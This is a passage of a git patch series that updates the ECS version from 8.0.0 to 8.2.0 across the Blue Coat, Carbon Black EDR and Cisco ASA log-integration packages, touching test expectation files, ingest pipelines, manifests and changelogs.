"event": { "ingested": "2022-01-25T12:01:11.728326368Z" @@ -842,7 +842,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728327419Z" @@ -854,7 +854,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728328474Z" 
@@ -866,7 +866,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728329505Z" @@ -878,7 +878,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728330532Z" @@ -890,7 +890,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728331697Z" @@ -902,7 +902,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728332742Z" @@ -914,7 +914,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728333765Z" @@ -926,7 +926,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728334775Z" @@ -938,7 +938,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728335819Z" @@ -950,7 +950,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728336835Z" @@ -962,7 +962,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728337844Z" @@ -974,7 +974,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728338852Z" @@ -986,7 +986,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728339867Z" @@ -998,7 +998,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728340895Z" @@ -1010,7 +1010,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728341902Z" @@ -1022,7 +1022,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728342980Z" 
@@ -1034,7 +1034,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728343991Z" @@ -1046,7 +1046,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728345003Z" @@ -1058,7 +1058,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728346014Z" @@ -1070,7 +1070,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728347054Z" @@ -1082,7 +1082,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728348065Z" @@ -1094,7 +1094,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728349078Z" @@ -1106,7 +1106,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728350087Z" @@ -1118,7 +1118,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728351111Z" @@ -1130,7 +1130,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728352127Z" @@ -1142,7 +1142,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728353159Z" @@ -1154,7 +1154,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728354179Z" @@ -1166,7 +1166,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728355187Z" @@ -1178,7 +1178,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728356196Z" @@ -1190,7 +1190,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728357211Z" 
diff --git a/packages/bluecoat/data_stream/director/elasticsearch/ingest_pipeline/default.yml b/packages/bluecoat/data_stream/director/elasticsearch/ingest_pipeline/default.yml index 6b0ef5c6bec..939ce13fe60 100644 --- a/packages/bluecoat/data_stream/director/elasticsearch/ingest_pipeline/default.yml +++ b/packages/bluecoat/data_stream/director/elasticsearch/ingest_pipeline/default.yml @@ -8,7 +8,7 @@ processors: value: '{{_ingest.timestamp}}' - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' # User agent - user_agent: field: user_agent.original diff --git a/packages/bluecoat/data_stream/director/sample_event.json b/packages/bluecoat/data_stream/director/sample_event.json index 5f65ce897fa..81ada87244c 100644 --- a/packages/bluecoat/data_stream/director/sample_event.json +++ b/packages/bluecoat/data_stream/director/sample_event.json @@ -13,7 +13,7 @@ "type": "logs" }, "ecs": { - "version": "1.12.0" + "version": "8.2.0" }, "elastic_agent": { "id": "4e3f135a-d5f9-40b6-ae01-2c834ecbead0", diff --git a/packages/bluecoat/manifest.yml b/packages/bluecoat/manifest.yml index 56780d6fe06..0b4d290b782 100644 --- a/packages/bluecoat/manifest.yml +++ b/packages/bluecoat/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: bluecoat title: Blue Coat Director Logs -version: 0.7.0 +version: 0.8.0 description: Collect director logs from Blue Coat devices with Elastic Agent. categories: ["network", "security"] release: experimental From 56172ec68586354295dc90250555f62bc492cbc1 Mon Sep 17 00:00:00 2001 
From: Taylor Swanson Date: Tue, 22 Feb 2022 13:31:22 -0600 Subject: [PATCH 09/23] Update carbonblack_edr to ECS 8.2 --- packages/carbonblack_edr/_dev/build/build.yml | 2 +- packages/carbonblack_edr/changelog.yml | 5 + .../pipeline/test-events.json-expected.json | 198 +++++++++--------- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../data_stream/log/sample_event.json | 2 +- packages/carbonblack_edr/docs/README.md | 2 +- packages/carbonblack_edr/manifest.yml | 2 +- 7 files changed, 109 insertions(+), 104 deletions(-) diff --git a/packages/carbonblack_edr/_dev/build/build.yml b/packages/carbonblack_edr/_dev/build/build.yml index 809e76063e9..d61527283ec 100644 --- a/packages/carbonblack_edr/_dev/build/build.yml +++ b/packages/carbonblack_edr/_dev/build/build.yml @@ -1,3 +1,3 @@ dependencies: ecs: - reference: git@8.0 + reference: git@8.2 diff --git a/packages/carbonblack_edr/changelog.yml b/packages/carbonblack_edr/changelog.yml index 7c98f1f327d..3a67be50db0 100644 --- a/packages/carbonblack_edr/changelog.yml +++ b/packages/carbonblack_edr/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.0" + changes: + - description: Update to ECS 8.2 + type: enhancement + link: https://github.com/elastic/integrations/pull/xxxx - version: "1.1.0" changes: - description: Update to ECS 8.0 diff --git a/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json-expected.json b/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json-expected.json index b2f426d6c6d..fbd1747776d 100644 --- a/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json-expected.json +++ b/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json-expected.json @@ -15,7 +15,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", 
@@ -54,7 +54,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -91,7 +91,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.observed", @@ -130,7 +130,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -169,7 +169,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -206,7 +206,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.observed", @@ -245,7 +245,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -284,7 +284,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -323,7 +323,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -370,7 +370,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "unknown", @@ -438,7 +438,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.observed", @@ -481,7 +481,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -542,7 +542,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "unknown", @@ -603,7 +603,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.observed", @@ -647,7 +647,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.moduleload", @@ -680,7 +680,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -718,7 +718,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "unknown", 
@@ -765,7 +765,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.observed", @@ -809,7 +809,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.moduleload", @@ -842,7 +842,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -892,7 +892,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.netconn", @@ -931,7 +931,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "unknown", @@ -976,7 +976,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.observed", @@ -1020,7 +1020,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.moduleload", @@ -1053,7 +1053,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -1104,7 +1104,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.netconn", @@ -1156,7 +1156,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "unknown", @@ -1241,7 +1241,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.regmod", @@ -1279,7 +1279,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.observed", @@ -1323,7 +1323,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.moduleload", @@ -1358,7 +1358,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -1409,7 +1409,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.netconn", @@ -1475,7 +1475,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "unknown", 
@@ -1552,7 +1552,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.regmod", @@ -1590,7 +1590,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.observed", @@ -1627,7 +1627,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.tamper", @@ -1672,7 +1672,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.moduleload", @@ -1707,7 +1707,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -1760,7 +1760,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.netconn", @@ -1821,7 +1821,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "unknown", @@ -1893,7 +1893,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.regmod", @@ -1931,7 +1931,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.observed", @@ -1968,7 +1968,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.tamper", @@ -2010,7 +2010,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.host.observed", @@ -2057,7 +2057,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.moduleload", @@ -2092,7 +2092,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -2143,7 +2143,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.netconn", @@ -2212,7 +2212,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "unknown", 
@@ -2274,7 +2274,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.regmod", @@ -2312,7 +2312,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.observed", @@ -2349,7 +2349,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.tamper", @@ -2391,7 +2391,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.host.observed", @@ -2438,7 +2438,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.moduleload", @@ -2481,7 +2481,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.module", @@ -2526,7 +2526,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -2577,7 +2577,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.netconn", @@ -2614,7 +2614,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "unknown", @@ -2655,7 +2655,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.regmod", @@ -2693,7 +2693,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.observed", @@ -2730,7 +2730,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.tamper", @@ -2772,7 +2772,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.host.observed", @@ -2819,7 +2819,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.moduleload", @@ -2862,7 +2862,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.module", 
@@ -2907,7 +2907,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -2957,7 +2957,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.netconn", @@ -2999,7 +2999,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "unknown", @@ -3047,7 +3047,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.remotethread", @@ -3095,7 +3095,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.regmod", @@ -3133,7 +3133,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.observed", @@ -3170,7 +3170,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.tamper", @@ -3212,7 +3212,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.host.observed", @@ -3259,7 +3259,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.moduleload", @@ -3302,7 +3302,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.module", @@ -3347,7 +3347,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -3398,7 +3398,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.netconn", @@ -3433,7 +3433,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "unknown", @@ -3482,7 +3482,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.remotethread", @@ -3530,7 +3530,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.regmod", 
@@ -3582,7 +3582,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.childproc", @@ -3621,7 +3621,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.observed", @@ -3658,7 +3658,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.tamper", @@ -3704,7 +3704,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.host.observed", @@ -3751,7 +3751,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.moduleload", @@ -3794,7 +3794,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.module", @@ -3839,7 +3839,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -3889,7 +3889,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.netconn", @@ -3933,7 +3933,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.regmod", @@ -3988,7 +3988,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.remotethread", @@ -4036,7 +4036,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.regmod", @@ -4088,7 +4088,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.childproc", @@ -4127,7 +4127,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.observed", @@ -4177,7 +4177,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.filemod", @@ -4218,7 +4218,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.host.observed", 
@@ -4265,7 +4265,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.moduleload", @@ -4308,7 +4308,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.module", @@ -4353,7 +4353,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -4403,7 +4403,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.netconn", @@ -4449,7 +4449,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.filemod", @@ -4501,7 +4501,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ingress.event.remotethread", diff --git a/packages/carbonblack_edr/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/carbonblack_edr/data_stream/log/elasticsearch/ingest_pipeline/default.yml index 6e59379d789..a10ab732a9e 100644 --- a/packages/carbonblack_edr/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/carbonblack_edr/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -7,7 +7,7 @@ processors: - set: field: ecs.version - value: 8.0.0 + value: 8.2.0 # Validate that the input document conforms to the expected format # to avoid repetitive checks. diff --git a/packages/carbonblack_edr/data_stream/log/sample_event.json b/packages/carbonblack_edr/data_stream/log/sample_event.json index 023f080713f..5afdcc33ab1 100644 --- a/packages/carbonblack_edr/data_stream/log/sample_event.json +++ b/packages/carbonblack_edr/data_stream/log/sample_event.json @@ -24,7 +24,7 @@ "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "9cb9fa70-f3e9-45d8-b1cb-61425bd93e1a", diff --git a/packages/carbonblack_edr/docs/README.md b/packages/carbonblack_edr/docs/README.md index 2effb4ae040..c0171ad7617 100644 --- a/packages/carbonblack_edr/docs/README.md 
+++ b/packages/carbonblack_edr/docs/README.md @@ -58,7 +58,7 @@ An example event for `log` looks as following: "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "9cb9fa70-f3e9-45d8-b1cb-61425bd93e1a", diff --git a/packages/carbonblack_edr/manifest.yml b/packages/carbonblack_edr/manifest.yml index 63ec957fb30..07261a6ae97 100644 --- a/packages/carbonblack_edr/manifest.yml +++ b/packages/carbonblack_edr/manifest.yml @@ -1,6 +1,6 @@ name: carbonblack_edr title: VMware Carbon Black EDR -version: 1.1.0 +version: 1.2.0 release: ga description: Collect logs from VMware Carbon Black EDR with Elastic Agent. type: integration From 213498a1878da98c238c64c3fc982d03211eb498 Mon Sep 17 00:00:00 2001 From: Taylor Swanson Date: Tue, 22 Feb 2022 14:53:14 -0600 Subject: [PATCH 10/23] Update cisco_asa to ECS 8.2 --- packages/cisco_asa/_dev/build/build.yml | 2 +- packages/cisco_asa/changelog.yml | 5 + ...test-additional-messages.log-expected.json | 170 +++--- ...test-anyconnect-messages.log-expected.json | 24 +- .../pipeline/test-asa-fix.log-expected.json | 22 +- .../test-asa-missing-groups.log-expected.json | 10 +- .../test/pipeline/test-asa.log-expected.json | 536 +++++++++--------- .../test-dap-records.log-expected.json | 2 +- .../pipeline/test-filtered.log-expected.json | 6 +- .../pipeline/test-hostnames.log-expected.json | 4 +- .../pipeline/test-not-ip.log-expected.json | 6 +- .../pipeline/test-sample.log-expected.json | 144 ++--- .../test/pipeline/test-sip.log-expected.json | 8 +- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../data_stream/log/sample_event.json | 2 +- packages/cisco_asa/docs/README.md | 2 +- packages/cisco_asa/manifest.yml | 2 +- 17 files changed, 476 insertions(+), 471 deletions(-) diff --git a/packages/cisco_asa/_dev/build/build.yml b/packages/cisco_asa/_dev/build/build.yml index 809e76063e9..d61527283ec 100644 --- a/packages/cisco_asa/_dev/build/build.yml +++ b/packages/cisco_asa/_dev/build/build.yml 
@@ -1,3 +1,3 @@ dependencies: ecs: - reference: git@8.0 + reference: git@8.2 diff --git a/packages/cisco_asa/changelog.yml b/packages/cisco_asa/changelog.yml index f71ecb3afc2..7be2c76dc7a 100644 --- a/packages/cisco_asa/changelog.yml +++ b/packages/cisco_asa/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "2.2.0" + changes: + - description: Update to ECS 8.2 + type: enhancement + link: https://github.com/elastic/integrations/pull/xxxx - version: "2.1.0" changes: - description: Add parsing for event code 113029-113040 diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json index 437e557653a..1b8f57939ba 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json @@ -22,7 +22,7 @@ "port": 53500 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -108,7 +108,7 @@ "port": 53500 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -186,7 +186,7 @@ "ip": "10.10.10.10" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -247,7 +247,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -307,7 +307,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -370,7 +370,7 @@ "ip": "10.10.10.10" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -445,7 +445,7 @@ "port": 111 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", 
@@ -526,7 +526,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -598,7 +598,7 @@ "port": 67 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -673,7 +673,7 @@ "port": 21 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -740,7 +740,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -784,7 +784,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -843,7 +843,7 @@ "ip": "192.168.2.2" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -904,7 +904,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -961,7 +961,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1025,7 +1025,7 @@ "ip": "10.10.10.10" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1092,7 +1092,7 @@ "ip": "10.10.10.10" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1160,7 +1160,7 @@ "port": 55225 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1247,7 +1247,7 @@ "port": 54839 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1325,7 +1325,7 @@ "port": 54230 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1401,7 +1401,7 @@ "ip": "192.168.2.2" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1470,7 +1470,7 @@ "port": 57006 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", 
@@ -1542,7 +1542,7 @@ "port": 14322 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1614,7 +1614,7 @@ "port": 53356 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1700,7 +1700,7 @@ "port": 22638 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1786,7 +1786,7 @@ "port": 22638 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1865,7 +1865,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1938,7 +1938,7 @@ "ip": "10.10.10.10" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2006,7 +2006,7 @@ "port": 65020 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2076,7 +2076,7 @@ "port": 443 }, "ecs": { - "version": 